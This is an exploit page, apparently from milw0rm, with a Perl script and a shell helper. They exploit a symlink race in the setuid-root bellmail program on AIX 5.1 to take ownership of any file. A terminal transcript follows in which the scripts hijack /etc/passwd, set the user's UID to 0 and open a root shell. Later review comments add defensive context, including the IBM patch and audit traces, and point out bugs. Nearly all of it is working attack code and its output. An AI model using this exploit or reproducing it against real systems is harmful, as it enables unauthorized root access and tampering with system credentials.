| -bash-2.05b$ | |
| -bash-2.05b$ cat x_aix5_bellmail.pl | |
| #!/usr/bin/perl | |
| # FileName: x_aix5_bellmail.pl | |
| # Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail | |
| # command on Aix5 to change any file's owner to the current user. | |
| # | |
| #Usage : x_aix5_bellmail.pl aim_file | |
| # aim_file : the file which you want to chown to yourself. | |
| # Note : Maybe you should run more than one to "Race condition". | |
| # The file named "x_bell.sh" can help you to use this exp. | |
| # You should type the "w" "Enter" then "q" "Enter" keys on the keyboard | |
| # as fast as you can when the bellmail "?" prompt appears. | |
| # | |
| # Author : watercloud@xfocus.org | |
| # XFOCUS Team | |
| # http://www.xfocus.net (CN) | |
| # http://www.xfocus.org (EN) | |
| # | |
| # Date : 2004-6-6 | |
| # Tested : on Aix5.1. | |
| # Addition: IBM had offered a patch named "IY25661" for it. | |
| # Announce: use at your own risk! | |
| # NOTE(review): no `use strict`/`use warnings`; every variable below is a package | |
| # global, which is also why the subs at the bottom can read $MBOX and $AIM_FILE. | |
| # Defensive reading: this is a symlink race against a privileged mail program (the | |
| # transcript below lists /usr/bin/bellmail as -r-sr-sr-x root mail). Per the header | |
| # the effect is that the target file's owner becomes the invoking user, and the | |
| # remedy the header names is IBM's patch IY25661. The pattern of ~1000 short-lived | |
| # forks plus repeated unlink/symlink of ~/mbox should be visible in process | |
| # accounting or audit trails. | |
| $CMD="/usr/bin/bellmail"; | |
| $MBOX="$ENV{HOME}/mbox"; # the user's mailbox; the transcript shows bellmail appending to /home/cloud/mbox | |
| $TMPFILE="/tmp/.xbellm.tmp"; # NOTE(review): fixed, predictable name in a world-writable directory -- this script is itself exposed to a symlink race on it | |
| $AIM_FILE = shift @ARGV ; # the file whose owner is to be changed | |
| $FORK_NUM = 1000; # number of children deamon() forks; each makes one unlink+symlink attempt if the mailbox exists | |
| die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE; | |
| unlink $MBOX; # remove any existing mailbox before starting | |
| # Both system() calls use the single-string form, so the shell parses them and | |
| # $TMPFILE / $ENV{LOGIN} are interpolated unquoted. | |
| system "echo abc > $TMPFILE"; | |
| system "$CMD $ENV{LOGIN} < $TMPFILE"; # bellmail <user> with the one-line message on stdin; the "From cloud ... abc" in the transcript is this message | |
| unlink $TMPFILE; | |
| # NOTE(review): the `"` after $AIM_FILE in both backtick commands is unbalanced as | |
| # written; the transcript still prints a "Before:" line, so confirm whether this is | |
| # an extraction artifact before relying on it. | |
| $ret=`ls -l $AIM_FILE"`; | |
| print "Before: $ret"; | |
| # Child: spawn $FORK_NUM racers. Parent: pause 0-3 s, then become bellmail. | |
| if( fork()==0 ) | |
| { | |
| &deamon($FORK_NUM); # `&name(...)` call style bypasses prototypes; deamon(...) is the conventional form | |
| exit 0 ; | |
| } | |
| sleep( (rand()*100)%4); # integer 0..3 seconds; randomised so repeated runs land at different offsets relative to the racers | |
| # exec replaces this process with an interactive bellmail session (the header says | |
| # to type "w"/"q" at its "?" prompt). The two lines after exec run only if exec | |
| # itself fails; the "Now:" line is never printed otherwise. | |
| exec $CMD; | |
| $ret=`ls -l $AIM_FILE"`; | |
| print "Now: $ret"; | |
| # Forks $num children; each child runs do_real() (which exits rather than | |
| # returning), while this process keeps looping and finally returns to the caller. | |
| # NOTE(review): the name is a misspelling of "daemon", kept because the caller uses | |
| # it; it is not a daemon either -- it neither detaches nor outlives the loop. | |
| sub deamon { | |
| $num = shift || 1; # defaults to 1; $num and $i are package globals (no `my`) | |
| for($i=0;$i<$num;$i++) { | |
| # NOTE(review): fork() returns undef on failure and undef==0 is true, so once the | |
| # process limit is hit the *parent* falls into do_real() and exits, ending the loop early. | |
| &do_real() if fork()==0; | |
| } | |
| } | |
| # Runs in a forked child: if the mailbox currently exists, replace it with a | |
| # symlink to the target and exit. This check-then-act (-e, unlink, symlink) is the | |
| # attacker side of the race; what bellmail does on its side is not shown on this | |
| # page. Return values of unlink and symlink are not checked. | |
| sub do_real { | |
| if(-e $MBOX) { | |
| unlink $MBOX ; | |
| symlink "$AIM_FILE",$MBOX; # "$AIM_FILE" is needlessly stringified; plain $AIM_FILE is equivalent | |
| } | |
| exit 0; # never returns to deamon(); the child is done after one attempt | |
| } | |
| #EOF | |
| -bash-2.05b$ | |
| -bash-2.05b$ cat x_bellmail.sh | |
| #!/bin/sh | |
| #File:x_bellmail.sh | |
| #The helper script for x_aix5_bellmail.pl | |
| #Author : watercloud@xfocus.org | |
| #Date :2004-6-6 | |
| # | |
| # NOTE(review): the Perl script's header refers to this helper as "x_bell.sh"; the | |
| # file shown on this page is x_bellmail.sh. | |
| X_BELL_PL="./x_aix5_bellmail.pl" | |
| AIM=$1 | |
| # NOTE(review): `ne` is not a test(1) operator (integer comparison is -ne); the | |
| # transcript below shows this line failing with "ne: 0403-012 A test command | |
| # parameter is not valid", so the argument-count check is ineffective as written. | |
| if [ $# ne 1 ] ;then | |
| echo "Need a aim file name as argv." | |
| exit 1; | |
| fi | |
| if [ ! -e "$1" ];then | |
| echo "$1 not exist!" | |
| exit 1 | |
| fi | |
| if [ ! -x "$X_BELL_PL" ];then | |
| echo "can not exec $X_BELL_PL" | |
| exit 1 | |
| fi | |
| # $AIM is unquoted in every ls below, so a path containing spaces would be split. | |
| ret=`ls -l $AIM` | |
| echo $ret; echo | |
| # Field 3 of `ls -l` is the owner column (e.g. "root" in the transcript). The | |
| # variable name collides with the fuser(1) command name, which is confusing. | |
| fuser=`echo $ret |awk '{print $3}'` | |
| # Re-run the Perl script until the owner column equals $LOGIN. | |
| # NOTE(review): if LOGIN is unset or empty this loop never terminates, and there | |
| # is no retry cap. | |
| while [ "$fuser" != "$LOGIN" ] | |
| do | |
| $X_BELL_PL $AIM | |
| ret=`ls -l $AIM` | |
| echo $ret;echo | |
| fuser=`echo $ret |awk '{print $3}'` | |
| done | |
| echo $ret; echo | |
| -bash-2.05b$ id | |
| uid=201(cloud) gid=1(staff) | |
| -bash-2.05b$ | |
| -bash-2.05b$ oslevel | |
| 5.1.0.0 | |
| -bash-2.05b$ oslevel -r | |
| 5100-01 | |
| -bash-2.05b$ ls -l /usr/bin/bellmail | |
| -r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail | |
| -bash-2.05b$ ls -l /etc/passwd | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| -bash-2.05b$ cp /etc/passwd /tmp/ | |
| -bash-2.05b$ ./x_bellmail.sh /etc/passwd | |
| ./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid. | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:30 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:35 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:40 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:43 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| w | |
| From cloud Sun Jun 6 08:49:48 2004 | |
| abc | |
| ? From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? w | |
| bellmail: cannot append to /home/cloud/mbox | |
| ? w | |
| bellmail: cannot append to /home/cloud/mbox | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:56 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:50:01 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd | |
| -rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd | |
| -bash-2.05b$ cat /etc/passwd | |
| root:!:0:0::/:/usr/bin/ksh | |
| daemon:!:1:1::/etc: | |
| bin:!:2:2::/bin: | |
| sys:!:3:3::/usr/sys: | |
| adm:!:4:4::/var/adm: | |
| uucp:!:5:5::/usr/lib/uucp: | |
| guest:!:100:100::/home/guest: | |
| nobody:!:4294967294:4294967294::/: | |
| lpd:!:9:4294967294::/: | |
| lp:*:11:11::/var/spool/lp:/bin/false | |
| invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh | |
| nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico | |
| snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd | |
| imnadm:*:188:188::/home/imnadm:/usr/bin/ksh | |
| cloud:!:201:1::/home/cloud:/usr/local/bin/bash | |
| -bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd | |
| -bash-2.05b$ su cloud | |
| cloud's Password: | |
| 3004-502 Cannot get "LOGNAME" variable. | |
| -bash-2.05b$ id | |
| uid=201 gid=1(staff) | |
| -bash-2.05b$ ls -l /etc/passwd | |
| -rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd | |
| -bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd | |
| -bash-2.05b$ cat /etc/passwd | |
| root:!:0:0::/:/usr/bin/ksh | |
| daemon:!:1:1::/etc: | |
| bin:!:2:2::/bin: | |
| sys:!:3:3::/usr/sys: | |
| adm:!:4:4::/var/adm: | |
| uucp:!:5:5::/usr/lib/uucp: | |
| guest:!:100:100::/home/guest: | |
| nobody:!:4294967294:4294967294::/: | |
| lpd:!:9:4294967294::/: | |
| lp:*:11:11::/var/spool/lp:/bin/false | |
| invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh | |
| nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico | |
| snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd | |
| imnadm:*:188:188::/home/imnadm:/usr/bin/ksh | |
| cloud:!:0:1::/home/cloud:/usr/local/bin/bash | |
| test:!:201:1::/home/cloud:/usr/local/bin/bash | |
| -bash-2.05b$ su cloud | |
| cloud's Password: | |
| bash-2.05b# id | |
| uid=0(root) gid=1(staff) | |
| bash-2.05b# ls -l /etc/passwd | |
| -rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd | |
| bash-2.05b# cp /tmp/passwd /etc/passwd | |
| bash-2.05b# chown root /tmp/passwd | |
| bash-2.05b# ls -l /tmp/passwd | |
| -rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd | |
| bash-2.05b# id | |
| uid=0(root) gid=1(staff) | |
| bash-2.05b# | |
| bash-2.05b# rm /tmp/.bel* | |
| bash-2.05b# rm /tmp/passwd | |
| bash-2.05b# | |
| # milw0rm.com [2005-05-19] |